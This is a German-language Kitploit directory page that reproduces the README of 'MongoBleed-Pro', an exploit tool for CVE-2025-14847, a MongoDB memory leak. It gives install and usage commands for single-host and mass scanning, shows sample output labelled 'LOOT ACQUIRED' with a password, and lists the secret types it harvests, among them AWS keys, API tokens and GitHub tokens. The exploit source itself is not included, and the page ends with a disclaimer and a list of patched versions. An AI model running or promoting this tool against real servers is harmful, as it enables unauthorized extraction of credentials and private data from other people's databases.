Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-14847_Expolit — Exploit-Tool für CVE-2025-14847, eine MongoDB-Speicher-Offenlegungsschwachstelle, die eine mehrthreadige Extraktion sensibler Daten und Geheimnisse aus verwundbaren Instanzen ermöglicht. | Kitploit
Tools/GitHubGitHub/alexcyberx/cve-2025-14847_expolit
SpeicherforensikSchwachstellenanalyseExploitationDatenexfiltrationPenetrationstestsSecret-ErkennungDatenbanksicherheit
GitHubalexcyberx/cve-2025-14847_expolit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-14847_Expolit

Exploit-Tool für CVE-2025-14847, eine MongoDB-Speicher-Offenlegungsschwachstelle, die eine mehrthreadige Extraktion sensibler Daten und Geheimnisse aus verwundbaren Instanzen ermöglicht.

Repository anzeigen
24vor 8 MonatenNoch nicht geprüft

MongoBleed-Pro ☠️

CVE Python License Status

Fortgeschrittenes MongoDB Memory-Leak-Exploit-Tool
Lerne weiter | Hacke weiter mit Alexcyberx


🔥 Über

MongoBleed-Pro ist ein fortgeschrittenes Exploitation-Tool für CVE-2025-14847, eine kritische Speicher-Offenlegungs-Schwachstelle in der zlib-Komprimierungsverarbeitung von MongoDB. Dieses Tool ermöglicht es Sicherheitsforschern, sensible Daten aus verwundbaren MongoDB-Instanzen zu extrahieren.

⚠️ Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Unbefugter Zugriff auf Computersysteme ist illegal. Holen Sie immer die entsprechende Genehmigung ein, bevor Sie Tests durchführen.


💀 Schwachstellendetails


🚀 Funktionen

  • ☠️ Hacker-Style UI - Elite-Terminal-Oberfläche mit Animationen
  • ⚡ Multi-Threaded-Scanning - Schnelle Speicherextraktion mit konfigurierbaren Threads
  • 🎯 Automatische Schwachstellenerkennung - Automatische Verwundbarkeitsprüfung vor der Ausnutzung
  • 🔑 Geheimnis-Mustererkennung - Findet AWS-Keys, API-Tokens, Passwörter, E-Mails
  • 📊 Echtzeit-Fortschritt - Live-Visualisierung des Speicherlecks
  • 💾 Datenexport - Speichert extrahierte Daten in Dateien zur Analyse
  • 🌐 Massen-Scanning - Scannt mehrere Ziele aus Datei

📦 Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/alexcyberx/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit

# Install dependencies
pip install -r requirements.txt

🎮 Verwendung

Grundlegende Verwendung

root@kitploit:~
python3 mongobleed_pro.py

Spezifischen Host anvisieren

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100

Benutzerdefinierter Port

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100:27018

Massen-Scanning

root@kitploit:~
python3 mongobleed_pro.py --file targets.txt

Erweiterte Optionen

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000

Alle Optionen


📸 Screenshots

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀                 ║
╚══════════════════════════════════════════════════════════════╝

⚡ Target Acquired: 192.168.1.100:27017
   ✓ Port OPEN
   ☠️  VULNERABLE! Initiating attack...

  ◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
  ☠️  LOOT ACQUIRED: 🔐 Password
      → admin_pass=SuperSecret123

╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║  💾 Bytes Extracted: 125,847
║  📦 Unique Fragments: 342
║  🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝

🔑 Erkannte Geheimnistypen

  • 🔑 AWS Access Keys (AKIA...)
  • 🤖 OpenAI API Keys (sk-...)
  • 🐙 GitHub Tokens (ghp_...)
  • 🔐 Passwörter & Geheimnisse
  • 📧 E-Mail-Adressen

📁 Ausgabedateien

FileBeschreibung
loot_<host>.txtExtrahierte Geheimnisse in lesbarem Format
dump_<host>.binRoher Speicherauszug zur manuellen Analyse

🛡️ Abhilfe

Wenn Sie ein MongoDB-Administrator sind, aktualisieren Sie auf die gepatchten Versionen:

  • MongoDB 8.0.10+
  • MongoDB 7.3.6+
  • MongoDB 7.0.19+
  • MongoDB 6.0.23+

👤 Autor

alexcyberx

  • 🐦 Instagram: @alex_cyberx

📜 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert - siehe die LICENSE Datei für Details.


⭐ Unterstützung

Wenn Sie dieses Tool nützlich fanden, geben Sie ihm bitte einen ⭐ auf GitHub!


「 Lerne weiter | Hacke weiter 」
Gemacht mit ❤️ von alexcyberx

Tool herunterladen
PropertyDetails
CVE IDCVE-2025-14847
Vulnerability TypeSpeicher-Offenlegung
Affected VersionsMongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23
Root CauseBuffer-Over-Read in der zlib-Dekomprimierung
ImpactUnausthentifizierter entfernter Speicherleck
ArgumentBeschreibungStandard
--targetZiel-IP/URLInteraktive Eingabeaufforderung
--fileDatei mit ZiellisteKeine
--threadsAnzahl der Threads50
--min-offsetMinimaler Speicher-Offset20
--max-offsetMaximaler Speicher-Offset8192